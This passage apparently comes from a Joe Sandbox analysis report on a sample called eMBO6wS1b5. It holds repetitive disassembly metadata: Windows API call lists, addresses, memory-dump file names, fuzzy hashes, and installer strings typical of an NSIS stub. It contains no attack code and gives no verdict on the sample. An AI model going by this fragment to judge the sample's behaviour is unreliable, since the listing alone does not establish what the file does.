                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                          • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                          • API String ID: 1641139501-220328614
                                                                                          • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                          • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                          • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                          • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                          APIs
                                                                                          • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                          • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                          • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                          • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                          • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                          • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                          • API String ID: 3734993849-3206598305
                                                                                          • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                          • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                          • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                          • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                          APIs
                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                          • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                          • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                          Strings
                                                                                          • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                          • String ID: created uninstaller: %d, "%s"
                                                                                          • API String ID: 3294113728-3145124454
                                                                                          • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                          • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                          • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                          • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426579,762323A0,00000000), ref: 00404FD6
                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426579,762323A0,00000000), ref: 00404FE6
                                                                                            • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426579,762323A0,00000000), ref: 00404FF9
                                                                                            • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                          • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                          Strings
                                                                                          • `G, xrefs: 0040246E
                                                                                          • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                          • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                          • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                          • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                          • API String ID: 1033533793-4193110038
                                                                                          • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                          • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                          • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                          • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                          APIs
                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                          • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                          • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                          • GetSysColor.USER32(?), ref: 00403E57
                                                                                          • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                          • DeleteObject.GDI32(?), ref: 00403E81
                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2320649405-0
                                                                                          • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                          • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                          • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                          • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                          APIs
                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426579,762323A0,00000000), ref: 00404FD6
                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426579,762323A0,00000000), ref: 00404FE6
                                                                                            • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426579,762323A0,00000000), ref: 00404FF9
                                                                                            • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                            • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                            • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                          Strings
                                                                                          • Exec: command="%s", xrefs: 00402241
                                                                                          • Exec: success ("%s"), xrefs: 00402263
                                                                                          • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                          • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                          • API String ID: 2014279497-3433828417
                                                                                          • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                          • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                          • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                          • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                          • GetMessagePos.USER32 ref: 0040489D
                                                                                          • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$Send$ClientScreen
                                                                                          • String ID: f
                                                                                          • API String ID: 41195575-1993550816
                                                                                          • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                          • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                          • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                          • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                          APIs
                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                          • MulDiv.KERNEL32(00053A00,00000064,001439C3), ref: 00403295
                                                                                          • wsprintfW.USER32 ref: 004032A5
                                                                                          • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                          Strings
                                                                                          • verifying installer: %d%%, xrefs: 0040329F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                          • String ID: verifying installer: %d%%
                                                                                          • API String ID: 1451636040-82062127
                                                                                          • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                          • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                          • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                          • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                          APIs
                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                          • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                          • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                          • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: Char$Next$Prev
                                                                                          • String ID: *?|<>/":
                                                                                          • API String ID: 589700163-165019052
                                                                                          • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                          • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                          • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                          • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                          APIs
                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                          • String ID:
                                                                                          • API String ID: 1912718029-0
                                                                                          • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                          • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                          • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                          • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                          APIs
                                                                                          • GetDlgItem.USER32(?), ref: 004020A3
                                                                                          • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                          • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                          • String ID:
                                                                                          • API String ID: 1849352358-0
                                                                                          • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                          • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                          • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                          • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                          APIs
                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
